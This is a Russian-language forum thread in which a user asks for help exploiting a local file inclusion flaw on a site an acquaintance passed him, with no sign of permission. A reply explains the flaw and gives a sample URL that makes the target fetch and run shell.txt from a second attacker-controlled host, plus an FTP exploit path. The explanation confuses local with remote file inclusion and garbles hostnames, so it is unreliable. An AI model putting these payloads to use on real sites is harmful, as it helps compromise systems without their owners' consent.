• Codeby web-security - Курс "Тестирование Веб-Приложений на проникновение с нуля" от команды codeby. Общая теория, подготовка рабочего окружения, пассивный фаззинг и фингерпринт, Активный фаззинг, Уязвимости, Пост-эксплуатация, Инструментальные средства, Social Engeneering и многое другое. Подробнее ...

  • Мобильный клиент нашего форума для Android гаджетов доступен в Google Play Market по этой ссылке. Клиент можно скачать с нашего форума по этой ссылке. Последняя версия МК в нашем телеграм канале вот здесь

Проблема lfi уязвимость

mrfear41

New member
30.04.2018
4
1
#1
Мне знакомый подогнал сайт с lfi уязвимостью и fpd, сказал что для lfi нужен обход. Я шаманил пытался раскрутить и ничего не вышло. Есть тут знающие люди которые смогут мне помочь?
 
Последнее редактирование:

Глюк

Red Team
03.01.2018
658
1 170
#2
Мне знакомый подогнал сайт с lfi уязвимостью и уязвимостью fpd, сказал что для lfi нужен обход. Я шаманил пытался раскрутить и нихуя не вышло. Есть тут знающие люди которые смогут мне помочь?
Возможно помочь и смогут. Но после того как перестанете материться. Ознакомьтесь пожалуйста с правилами форума.
 
Симпатии: Понравилось Sphinx

Sphinx

Премиум
27.07.2018
35
131
#5
LFI (Local File Inclusion) — уязвимость, позволяющая выполнить сторонний код, загрузить экслойт или выполнить любую другую вредоносную функцию.
Данная уязвимость также известна как PHP-инъекция. Суть её заключается в том, что посредством какого либо параметра заменяется его значение.
Положим, что у нас есть некий сайт по адресу hex.onioncom, на котором возможно PHP-инъекция, и поставлена цель использовать данную уязвимость. Однако, понадобится второй ресурс, нечто похожее на плацдарм. Сей плацдарм располагается по адресу sohex.onioncom. Для того, чтобы выполнить производный код на уязвимом сайте, необходимо создать файл на плацдарме с набором команд. Выглядеть сие будет примерно таким образом:
https://hex.com/index.php?random=https://sohex.com/shell.txt?
Исходя из всего этого, все команды из файла shell.txt будут выполнены на уязвимом сайте.
Также подобным методом вполне возможна загрузка эксплойта посредством FTP:
https://hex.com/index.php?random=C:\\ftp\\upload\\exploit.
Надеюсь, я сумел хоть малейшим образом помочь Вам.
С уважением.
 
Последнее редактирование:
Вверх Снизу